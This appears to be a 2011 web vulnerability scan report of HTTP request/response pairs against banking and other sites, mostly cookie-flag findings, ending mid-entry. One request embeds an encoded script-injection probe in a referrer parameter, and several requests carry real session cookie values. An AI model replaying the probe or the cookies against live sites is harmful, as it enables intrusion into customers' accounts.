HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000xqKx0Pm6KLlxeiVVja8EmdE:13k5uoqt5; Path=/ Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Thu, 03 Feb 2011 01:04:58 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Location: pbl.asp Content-Length: 128 Content-Type: text/html Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=BDCPFOICCKLENOGJKIBLOLMG; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: stg.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /i?siteID=429&ts=1296684340039&location=http%3A%2F%2Fwww.bankofamerica.com%2Ffindit%2Ferror.cgi%3FBOA_0020%3D20110202%3A0%3AO%3A5067fc0c-5451-405a-bffc3c21dd627de9%26state%3Dfalse%26BA_0021%3Dfalse&tagv=4.3&tz=-360&r=http%3A%2F%2Fwww.bankofamerica.com%2Fvehicle_and_personal_loans544ce%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E45ae18a6011%2Findex.cfm&title=Bank%20of%20America%20%7C%20Please%20Try%20Again&cd=16&ah=1156&aw=1920&sh=1200&sw=1920&pd=16 HTTP/1.1 Host: tc.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica.com/findit/error.cgi Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21
Response
HTTP/1.1 200 OK Cache-control: no-cache, private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Wed, 02 Feb 2011 22:04:41 GMT Last-Modified: Wed, 02 Feb 2011 22:04:41 GMT P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE" Set-Cookie: TCID=0007ae71-9ad3-3b5c-9719-884700000028;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:04:41 GMT; Connection: Keep-Alive Content-Length: 43 Content-Type: image/gif Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:04:42 GMT;path=/;domain=bankofamerica.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c?siteid=429&ccID=BOA_HOME_SIGNON_SERVICE_01&ccID=BOA_HOME_SIGNON_SERVICE_02&ccID=BOA_HOME_SIGNON_SERVICE_03&ccID=BOA_HOME_SIGNON_HERO&location=https%3A%2F%2Fwww.bankofamerica.com%2Fhomepage%2Foverview.go%3FBOA_0020%3D999%26tc_lang%3Den_US%26state%3Dnull%26BA_0021%3Dnull%26BOA_HPR%3Dnull HTTP/1.1 Host: tc.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-control: no-cache, private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Wed, 02 Feb 2011 22:02:37 GMT Last-Modified: Wed, 02 Feb 2011 22:02:37 GMT P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE" Set-Cookie: TCID=0007ae71-99a3-d958-8d17-88470000005a;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:02:37 GMT; Connection: Keep-Alive Content-Length: 563 Content-Type: text/javascript; charset=ISO-8859-1 Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:02:38 GMT;path=/;domain=bankofamerica.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: translate.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:04 GMT Expires: Thu, 03 Feb 2011 01:05:04 GMT Cache-Control: private, max-age=86400 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: PREF=ID=1bec15895da74ab0:TM=1296695104:LM=1296695104:S=GaVtpWsLtBVoNxSV; expires=Sat, 02-Feb-2013 01:05:04 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /translate_t?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1 Host: translate.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:02 GMT Expires: Thu, 03 Feb 2011 01:05:02 GMT Cache-Control: private, max-age=86400 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: PREF=ID=25ad30bb14812802:TM=1296695102:LM=1296695102:S=SmhVQvsJtj0-g9k_; expires=Sat, 02-Feb-2013 01:05:02 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?country=us&ep=v_gg_new&akamai=true HTTP/1.1 Host: usa.visa.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: video.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Thu, 03 Feb 2011 01:05:06 GMT Expires: Thu, 03 Feb 2011 01:05:06 GMT Cache-Control: private, max-age=0 Set-Cookie: PREF=ID=451bdac0aa428edb:TM=1296695106:LM=1296695106:S=qUfuqTtbKJhEKHvk; expires=Sat, 02-Feb-2013 01:05:06 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: VSFE_1.0 X-XSS-Protection: 1; mode=block Connection: close
<!doctype html> <meta content="text/html; charset=UTF-8" http-equiv=content-type> <meta content="Search millions of videos from across the web." name=description> <title>Google Videos</title> <script> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/stories/2011/01/20/3117032.htm HTTP/1.1 Host: www.abc.net.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Cache-Control: max-age=300 Expires: Thu, 03 Feb 2011 01:10:09 GMT Date: Thu, 03 Feb 2011 01:05:09 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: ABCGuestID=24.143.206.110.73161296695109607; expires=Thu, 03-Feb-2011 01:35:09 GMT; path=/; domain=abc.net.au Content-Length: 41425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" xmlns="http://www.w3.org/1999/xht ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rural/news/content/201102/s3126694.htm HTTP/1.1 Host: www.abc.net.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Cache-Control: max-age=300 Expires: Thu, 03 Feb 2011 01:10:08 GMT Date: Thu, 03 Feb 2011 01:05:08 GMT Content-Length: 10862 Connection: close Set-Cookie: ABCGuestID=24.143.206.110.73161296695108706; expires=Thu, 03-Feb-2011 01:35:08 GMT; path=/; domain=abc.net.au
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"> <html> <head>
<title>Tuna industry seeks lift in quotas, after boom se ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /creditcards/index.cfm?template=manage_card&RequestTimeout=120 HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:35:17 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CCPATH=Affiliate; path=/; domain=.bankofamerica.com; Set-Cookie: CONTEXT=; expires=Mon, 03-Jan-2011 22:35:11 GMT; path=/; Set-Cookie: TRACKING_CODE=; path=/; Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:22 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=132934232; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=4303b0d%2D0003b41a%2Dd4aa%2D1d49%2Da6b8%2D83deedcb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; expires=Tue, 02-Aug-2011 00:00:00 GMT; path=/; domain=.bankofamerica.com; Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; path=/; domain=.bankofamerica.com; Connection: close Set-Cookie: BIGipServerngen-www.80=3064379051.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:33:14 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; expires=Tue, 02-Aug-2011 00:00:00 GMT; path=/; domain=.bankofamerica.com; Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; path=/; domain=.bankofamerica.com; Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bankofamerica.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit-cards/cardoverview.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:02 GMT Content-length: 0 Content-type: text/html Set-Cookie: SMIDENTITY=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; path=/; domain=.bankofamerica.com; secure Location: https://www.bankofamerica.com/credit-cards/viewall.action?context_id=all_cards Content-language: en-US Set-cookie: JSESSIONID=0000RfDmnLt4u-iNR9enyTATw_C:12qb4kb6q; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/overview.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/stateSelect.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myexpression_banking/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /retirementcenter HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /retirementcenter/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:40 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=1p8qNJWYfWB5ZkwnxDLZnjSHsp1RWFYccXhcpFpZ4PHTpW00Lg88!1025162061; path=/ Set-Cookie: Corporate=6d2bccf6cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCo8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS06NMzQwgKj3zENTDAA%3D; domain=.capitalone.com; expires=Saturday, 30-Jan-2021 22:12:40 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 55757
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Explore the history and culture of one of America's ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/auto-loan-calculator.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:26 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:26 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 33970
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
<head> <title>Auto Payment and Other Auto Calculators - Capital One</title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
